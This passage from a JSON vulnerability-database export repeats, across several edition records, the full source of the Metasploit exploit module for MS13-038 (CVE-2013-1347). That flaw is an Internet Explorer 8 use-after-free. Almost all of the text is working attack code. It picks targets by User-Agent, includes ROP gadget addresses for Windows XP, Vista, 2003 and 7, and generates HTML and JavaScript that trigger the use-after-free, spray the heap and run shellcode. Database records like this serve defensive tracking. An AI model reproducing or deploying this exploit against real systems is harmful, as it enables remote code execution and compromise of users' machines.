[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-28T02:44:56", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-28T04:44:02", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-28T04:44:02", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-28T06:43:39", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-28T06:43:39", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-03T19:09:19", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-03T19:09:19", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's 